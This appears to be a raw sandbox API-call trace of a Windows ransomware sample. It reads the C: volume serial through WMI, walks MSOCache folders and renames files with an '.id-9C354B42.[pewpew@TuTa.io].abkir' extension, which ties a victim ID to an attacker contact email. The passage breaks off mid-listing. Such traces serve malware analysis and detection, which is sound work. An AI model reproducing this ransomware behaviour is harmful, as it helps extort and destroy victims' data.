Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbb59e8) returned 0x0 [0201.622] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb59e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.622] WbemDefPath:IUnknown:Release (This=0xbb59e8) returned 0x3 [0201.622] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0201.622] CoGetContextToken (in: pToken=0x6c0e440 | out: pToken=0x6c0e440) returned 0x0 [0201.622] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0201.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0201.622] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0201.622] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0201.622] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0201.622] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0201.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6029ea0) returned 0x0 [0201.622] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0201.622] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0201.622] WbemDefPath:IWbemPath:SetText (This=0x6029ea0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0201.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0201.622] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0201.622] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.622] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0201.622] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0201.622] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0201.622] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.623] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6024aa0) returned 0x0 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0201.623] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024aa0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027910) returned 0x0 [0201.623] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x0 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027910) returned 0x0 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0201.623] WbemLocator:IUnknown:AddRef (This=0x6027910) returned 0x3 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0201.623] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0201.623] CoGetContextToken (in: pToken=0x6c0e720 | out: pToken=0x6c0e720) returned 0x0 [0201.623] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0201.624] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0201.624] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x2 [0201.624] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x1 [0201.624] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0201.624] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0201.624] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027910) returned 0x0 [0201.624] WbemLocator:IUnknown:AddRef (This=0x6027910) returned 0x3 [0201.624] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x2 [0201.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0201.624] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0201.624] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.624] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x60277d0) returned 0x0 [0201.624] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60277d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6033794) returned 0x0 [0202.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5bc74) returned 0x0 [0202.957] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bc74, pProxy=0x6033794, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0202.957] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x1 [0202.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5bc94) returned 0x0 [0202.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5bc74) returned 0x0 [0202.957] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bc74, pProxy=0x6033794, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.957] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x2 [0202.957] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0202.957] CoTaskMemFree (pv=0xbd4918) [0202.957] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x0 [0202.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5bc94) returned 0x0 [0202.957] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0202.962] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0202.963] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0202.963] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0202.964] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0202.967] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5bbf4) returned 0x0 [0202.967] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bbf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.967] WbemLocator:IUnknown:Release (This=0xb5bbf4) returned 0x3 [0202.967] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0202.967] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0202.967] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5bc7c) returned 0x0 [0202.967] WbemLocator:IRpcOptions:Query (in: This=0xb5bc7c, pPrx=0xb5bc94, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0202.967] WbemLocator:IUnknown:Release (This=0xb5bc7c) returned 0x3 [0202.967] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0202.967] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0202.967] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0202.967] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6033794) returned 0x0 [0202.967] WbemLocator:IUnknown:AddRef (This=0x6033794) returned 0x4 [0202.967] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x3 [0202.967] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x2 [0202.968] SysStringLen (param_1=0x0) returned 0x0 [0202.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0202.968] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0202.968] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.968] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0202.968] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0202.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5bc94) returned 0x0 [0202.968] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x3 [0202.968] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0202.968] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0202.968] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.968] IWbemServices:GetObject (in: This=0x6033794, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0203.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0203.086] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0203.086] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.086] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c19cc*=0, plFlavor=0x36c19d0*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c19cc*=8, plFlavor=0x36c19d0*=0) returned 0x0 [0203.086] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.087] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.087] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c19cc*=8, plFlavor=0x36c19d0*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c19cc*=8, plFlavor=0x36c19d0*=0) returned 0x0 [0203.087] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.087] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0203.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0203.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0203.087] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x31e562c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0203.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0203.087] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0203.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0203.088] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0203.088] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0203.088] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0203.089] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.089] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0203.089] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0203.089] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0203.090] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0203.090] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: 